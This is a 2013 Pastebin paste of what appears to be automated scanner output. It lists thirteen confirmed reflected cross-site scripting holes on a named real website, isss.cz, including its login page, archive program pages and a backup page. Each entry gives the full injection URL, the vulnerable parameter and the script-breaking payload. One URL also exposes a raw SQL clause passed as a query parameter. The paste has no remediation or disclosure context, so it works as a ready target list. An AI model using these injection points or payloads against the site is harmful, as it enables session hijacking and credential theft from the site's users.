API tools faq
paste
Advertisement
sroub3k

isss.cz

sroub3k
Apr 26th, 2013
212
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.87 KB | None | 0 0
raw download clone embed print report
  1. XSS (Cross-site Scripting)
  2.  
  3. Severity: Important
  4. Confirmation: Confirmed
  5. URL: https://www.isss.cz/portal/login.asp?'"--></style></script><script>alert(0x00009C)</script>
  6. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  7. Parameter Name: Query Based
  8. Parameter Type: FullQueryString
  9. Attack Pattern: '"--></style></script><script>alert(0x00009C)</script>
  10.  
  11. Severity: Important
  12. Confirmation: Confirmed
  13. URL: https://www.isss.cz/portal/login.asp?req='"--></style></script><script>alert(0x000244)</script>&empty=1
  14. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  15. Parameter Name: req
  16. Parameter Type: Querystring
  17. Attack Pattern: '"--></style></script><script>alert(0x000244)</script>
  18.  
  19. Severity: Important
  20. Confirmation: Confirmed
  21. URL: http://www.isss.cz/program.asp?subjekt='"--></style></script><script>alert(0x00023F)</script>
  22. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  23. Parameter Name: subjekt
  24. Parameter Type: Querystring
  25. Attack Pattern: '"--></style></script><script>alert(0x00023F)</script>
  26.  
  27. Severity: Important
  28. Confirmation: Confirmed
  29. URL: https://www.isss.cz/portal/login.asp
  30. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  31. Parameter Name: req
  32. Parameter Type: Post
  33. Attack Pattern: '"--></style></script><script>alert(0x000490)</script>
  34.  
  35. Severity: Important
  36. Confirmation: Confirmed
  37. URL: http://www.isss.cz/archiv/2012/program.asp?subjekt='"--></style></script><script>alert(0x000A53)</script>
  38. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  39. Parameter Name: subjekt
  40. Parameter Type: Querystring
  41. Attack Pattern: '"--></style></script><script>alert(0x000A53)</script>
  42.  
  43. Severity: Important
  44. Confirmation: Confirmed
  45. URL: http://www.isss.cz/archiv/2006/program.asp?subjekt='"--></style></script><script>alert(0x001345)</script>
  46. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  47. Parameter Name: subjekt
  48. Parameter Type: Querystring
  49. Attack Pattern: '"--></style></script><script>alert(0x001345)</script>
  50.  
  51. Severity: Important
  52. Confirmation: Confirmed
  53. URL: http://www.isss.cz/archiv/2003/program.asp?subjekt='"--></style></script><script>alert(0x001560)</script>
  54. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  55. Parameter Name: subjekt
  56. Parameter Type: Querystring
  57. Attack Pattern: '"--></style></script><script>alert(0x001560)</script>
  58.  
  59. Severity: Important
  60. Confirmation: Confirmed
  61. URL: http://www.isss.cz/archiv/2005/program.asp?subjekt='"--></style></script><script>alert(0x00170A)</script>
  62. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  63. Parameter Name: subjekt
  64. Parameter Type: Querystring
  65. Attack Pattern: '"--></style></script><script>alert(0x00170A)</script>
  66.  
  67. Severity: Important
  68. Confirmation: Confirmed
  69. URL: http://www.isss.cz/archiv/2004/program.asp?subjekt='"--></style></script><script>alert(0x00190E)</script>
  70. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  71. Parameter Name: subjekt
  72. Parameter Type: Querystring
  73. Attack Pattern: '"--></style></script><script>alert(0x00190E)</script>
  74.  
  75. Severity: Important
  76. Confirmation: Confirmed
  77. URL: http://www.isss.cz/archiv/2010/program.asp?subjekt='"--></style></script><script>alert(0x001FCF)</script>
  78. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  79. Parameter Name: subjekt
  80. Parameter Type: Querystring
  81. Attack Pattern: '"--></style></script><script>alert(0x001FCF)</script>
  82.  
  83. Severity: Important
  84. Confirmation: Confirmed
  85. URL: http://www.isss.cz/archiv/2008/program.asp?subjekt='"--></style></script><script>alert(0x00204F)</script>
  86. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  87. Parameter Name: subjekt
  88. Parameter Type: Querystring
  89. Attack Pattern: '"--></style></script><script>alert(0x00204F)</script>
  90.  
  91. Severity: Important
  92. Confirmation: Confirmed
  93. URL: http://www.isss.cz/backup.asp?from='"--></style></script><script>alert(0x002149)</script>
  94. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  95. Parameter Name: from
  96. Parameter Type: Querystring
  97. Attack Pattern: '"--></style></script><script>alert(0x002149)</script>
  98.  
  99. Severity: Important
  100. Confirmation: Confirmed
  101. URL: http://www.isss.cz/archiv/2007/program.asp?subjekt='"--></style></script><script>alert(0x002170)</script>
  102. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  103. Parameter Name: subjekt
  104. Parameter Type: Querystring
  105. Attack Pattern: '"--></style></script><script>alert(0x002170)</script>
  106.  
  107. Severity: Important
  108. Confirmation: Confirmed
  109. URL: http://www.isss.cz/archiv/2003/program.asp?nazev='"--></style></script><script>alert(0x00234F)</script>&sql=den=#03/24/2003# AND lokalita=18 AND cas>=#09:00:00# AND cas+delka<=#10:35:00#
  110. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  111. Parameter Name: nazev
  112. Parameter Type: Querystring
  113. Attack Pattern: '"--></style></script><script>alert(0x00234F)</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!